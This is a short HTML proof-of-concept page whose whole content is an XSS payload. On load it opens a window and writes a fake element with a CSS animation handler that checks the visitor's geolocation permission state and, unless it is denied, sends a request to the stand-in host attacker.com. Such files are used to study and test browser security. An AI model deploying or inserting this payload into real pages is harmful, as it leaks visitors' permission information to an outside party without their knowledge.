<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>
</head>
<body>
<script>
window.onload = function() {
    w=window.open("self.js"); w.document.write("<style>@keyframes GGGUUHXxGGG{}<\/style><xss style=animation-name:GGGUUHXxGGG onanimationstart='navigator.permissions.query({name:`geolocation`}).then(r=>{if(r.state!=`denied`)fetch(`https://attacker.com/report/report?query=1`)})'><\/xss>");
};
</script>
</body>
</html>
